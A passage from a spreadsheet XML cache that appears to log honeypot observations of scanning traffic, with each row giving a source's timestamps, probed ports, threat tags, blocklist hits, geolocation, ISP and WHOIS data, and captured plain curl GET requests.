    <s v="TOT Public Company Limited"/>
    <s v="2010-12-13"/>
    <s v="TOT-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656d:a9f7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3434"/>
    <x v="3434"/>
    <s v="NA&amp;&amp;114-35-57-211.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T03:22:56"/>
    <d v="2023-12-03T21:49:00"/>
    <d v="2025-04-03T03:22:56"/>
    <n v="788"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;52059&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7223:39d3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3435"/>
    <x v="3435"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T03:12:03"/>
    <d v="2025-04-03T03:05:19"/>
    <d v="2025-04-03T03:12:03"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Tarn Taran"/>
    <s v="Tarn Taran"/>
    <s v="1254868"/>
    <s v="NA"/>
    <s v="31.4519"/>
    <s v="74.9278"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:8562"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3436"/>
    <x v="3436"/>
    <s v="NA&amp;&amp;220-135-138-99.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T03:01:09"/>
    <d v="2024-09-03T01:24:00"/>
    <d v="2025-04-03T03:01:09"/>
    <n v="711"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25966&amp;&amp;23&amp;&amp;46631&amp;&amp;9100&amp;&amp;41695&amp;&amp;60854&amp;&amp;80&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:8a63"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3437"/>
    <x v="3437"/>
    <s v="59-126-188-50.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:46:17"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T02:46:17"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;21941&amp;&amp;NA&amp;&amp;23"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="GET&amp;&amp;NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:bc32"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3438"/>
    <x v="3438"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:40:21"/>
    <d v="2025-04-03T02:40:21"/>
    <d v="2025-04-03T02:40:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:6a7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3439"/>
    <x v="3439"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:39:09"/>
    <d v="2025-04-03T02:39:09"/>
    <d v="2025-04-03T02:39:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:2901"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3440"/>
    <x v="3440"/>
    <s v="syn-098-026-114-134.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-03T02:33:47"/>
    <d v="2025-04-03T02:33:47"/>
    <d v="2025-04-03T02:33:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NC"/>
    <s v="North Carolina"/>
    <s v="Wake"/>
    <s v="Raleigh"/>
    <s v="4487042"/>
    <s v="27609"/>
    <s v="35.8409"/>
    <s v="-78.6228"/>
    <s v="11426"/>
    <s v="TWC-11426-CAROLINAS"/>
    <s v="Charter Communications"/>
    <s v="corporate"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:621a:7286"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3441"/>
    <x v="3441"/>
    <s v="122-117-63-117.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:10:48"/>
    <d v="2023-12-04T06:30:00"/>
    <d v="2025-04-03T02:10:48"/>
    <n v="507"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;2547&amp;&amp;NA&amp;&amp;80&amp;&amp;23&amp;&amp;47160&amp;&amp;51844&amp;&amp;41442&amp;&amp;9100"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:3f75"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3442"/>
    <x v="3442"/>
    <s v="203-217-125-131.veetime.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:05:39"/>
    <d v="2023-12-01T21:38:00"/>
    <d v="2025-04-03T02:05:39"/>
    <n v="850"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;47337&amp;&amp;23&amp;&amp;48844&amp;&amp;43990&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.163"/>
    <s v="120.675"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="VEE Time Corp."/>
    <s v="business"/>
    <s v="VEETIME"/>
    <s v="None"/>
    <s v="VEETIME-TW"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:cbd9:7d83"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3443"/>
    <x v="3443"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:05:12"/>
    <d v="2025-04-03T02:05:12"/>
    <d v="2025-04-03T02:05:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Uberlândia"/>
    <s v="Uberlândia"/>
    <s v="3445831"/>
    <s v="NA"/>
    <s v="-18.9186"/>
    <s v="-48.2772"/>
    <s v="53006"/>
    <s v="AS53006"/>
    <s v="Algar Telecom S/A"/>
    <s v="corporate"/>
    <s v="Algar Telecom S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b16a:e2d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3444"/>
    <x v="3444"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T02:04:15"/>
    <d v="2025-04-03T02:04:15"/>
    <d v="2025-04-03T02:04:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:a5bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3445"/>
    <x v="3445"/>
    <s v="NA&amp;&amp;114-33-29-149.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T01:52:27"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-03T01:52:27"/>
    <n v="499"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
